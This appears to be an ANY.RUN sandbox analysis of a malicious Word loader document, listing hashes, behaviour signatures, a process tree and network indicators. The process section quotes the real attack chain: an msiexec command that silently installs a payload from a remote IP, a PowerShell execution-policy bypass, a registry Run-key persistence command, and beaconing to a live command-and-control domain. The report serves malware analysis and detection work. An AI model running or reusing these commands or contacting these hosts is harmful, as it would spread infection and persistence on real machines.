analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

NOTA GERENCIA DE ADM.doc

Full analysis: https://app.any.run/tasks/550511e9-56d0-42c8-9310-c68a2a7909c4
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 21, 2019, 20:41:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 26:00, Create Time/Date: Thu Mar 21 07:56:00 2019, Last Saved Time/Date: Thu Mar 21 08:22:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 9, Security: 0
MD5:

B33A8F8AA723240E2E8D3CFD74F66384

SHA1:

C07FAABB80CFA8F00E37770BEDF2D61A6849CF3A

SHA256:

9EC913A7C1694C9F63FCB28322BDAEEE2205C8924C8AE05CC4EE30AA314F6511

SSDEEP:

1536:VqfY8qaiKOCDP9czDKaT+ej7Nhbi9AFl1SLLPtArDaV:VHHaiKOi9LInKc2Or+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 320)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 320)
    • Application was dropped or rewritten from another process

      • nsA189.tmp (PID: 1004)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3524)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3524)
    • Loads dropped or rewritten executable

      • rundll32.exe (PID: 2804)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2564)
    • Changes the autorun value in the registry

      • reg.exe (PID: 908)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3524)
      • MSIA080.tmp (PID: 3020)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3524)
    • Starts application with an unusual extension

      • MSIA080.tmp (PID: 3020)
    • Starts CMD.EXE for commands execution

      • nsA189.tmp (PID: 1004)
      • rundll32.exe (PID: 2804)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 2512)
    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 1872)
    • Creates files in the user directory

      • powershell.exe (PID: 3128)
  • INFO

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 320)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 320)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3524)
    • Application was dropped or rewritten from another process

      • MSIA080.tmp (PID: 3020)
    • Loads dropped or rewritten executable

      • MSIA080.tmp (PID: 3020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: 1
Keywords: -
Template: Normal.dotm
LastModifiedBy: 1
RevisionNumber: 9
Software: Microsoft Office Word
TotalEditTime: 26.0 minutes
CreateDate: 2019:03:21 07:56:00
ModifyDate: 2019:03:21 08:22:00
Pages: 1
Words: 1
Characters: 9
Security: None
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 9
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Название
  • 1
CodePage: Windows Cyrillic
Created: 2018:12:18 00:00:00
LastSaved: 2018:12:18 00:00:00
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
11
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msia080.tmp nsa189.tmp no specs cmd.exe no specs rundll32.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
320"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NOTA GERENCIA DE ADM.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2060"C:\Windows\System32\msiexec.exe" at=c36Ik back=002 error=Continue /i http://169.239.128.104/alg /q OnExit="c:\windows\calc.exe" FW=c36Ik C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3524C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3020"C:\Windows\Installer\MSIA080.tmp"C:\Windows\Installer\MSIA080.tmp
msiexec.exe
User:
admin
Company:
hepsu burda
Integrity Level:
MEDIUM
Description:
hepsu burda Application
Version:
1.0.2.1
1004"C:\Users\admin\AppData\Local\Temp\nsqA188.tmp\nsA189.tmp" "cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Users\admin\AppData\Local\Temp\nsqA188.tmp\nsA189.tmpMSIA080.tmp
User:
admin
Integrity Level:
MEDIUM
2512"cmd.exe" /c rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\cmd.exensA189.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2804rundll32.exe C:\Users\admin\AppData\Local\Temp\xmlparse.dll, segaC:\Windows\system32\rundll32.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2564cmd.exe /C powershell -nop -ep bypass -f %temp%\enu.ps1C:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3128powershell -nop -ep bypass -f C:\Users\admin\AppData\Local\Temp\enu.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1872cmd.exe /C reg add "HKCU\SOFTWARE\microsoft\windows\currentversion\run" /v ServiceDLL /t REG_EXPAND_SZ /d "rundll32 %temp%\xmlparse.dll, sega" /fC:\Windows\system32\cmd.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 767
Read events
1 023
Write events
0
Delete events
0

Modification events

No data
Executable files
6
Suspicious files
4
Text files
10
Unknown types
7

Dropped files

PID
Process
Filename
Type
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR88ED.tmp.cvr
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB34F38704ED6FA02.TMP
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF4D06F41F88D352AC.TMP
MD5:
SHA256:
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC2ADAF7253AD491F.TMP
MD5:
SHA256:
3524msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF5B501E0BD0F22192.TMP
MD5:
SHA256:
3524msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3524msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:3CD91B8CF6CF513533C247B2711866A1
SHA256:8B76001E41C1D83C760EFDC315D62023527E6EE0F80DA3B92ADEA527D742EBEC
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:B711674A9C763F2B1E345A188434F106
SHA256:BEC97BD73B57F1B8F7529634B9705036C7111D09CE7BF8C84C61385B6FAC4A1F
320WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C91CA34DB7EC5878EF14204ADF6CC341
SHA256:F02548AAC4D84FF1EAAB4C5ABF65F3F44E135986425B77A44335EEBD7DD4DFD2
320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$TA GERENCIA DE ADM.docpgc
MD5:37424DC3D456F525F19CE772279E185E
SHA256:5E5BFF0C01E456D8A83BAA096991E6DBF4837FAC410245B31373AE997463FDB2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3524
msiexec.exe
GET
200
169.239.128.104:80
http://169.239.128.104/alg
ZA
executable
396 Kb
suspicious
2804
rundll32.exe
POST
200
179.43.156.37:80
http://cdnavupdate.icu/jquery/jquery.php
CH
text
140 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2804
rundll32.exe
179.43.156.37:80
cdnavupdate.icu
Private Layer INC
CH
suspicious
3524
msiexec.exe
169.239.128.104:80
Zappie Host LLC
ZA
suspicious

DNS requests

Domain
IP
Reputation
cdnavupdate.icu
  • 179.43.156.37
malicious

Threats

PID
Process
Class
Message
3524
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3524
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
2804
rundll32.exe
Potentially Bad Traffic
ET INFO HTTP POST Request to Suspicious *.icu domain
1 ETPRO signatures available at the full report
No debug info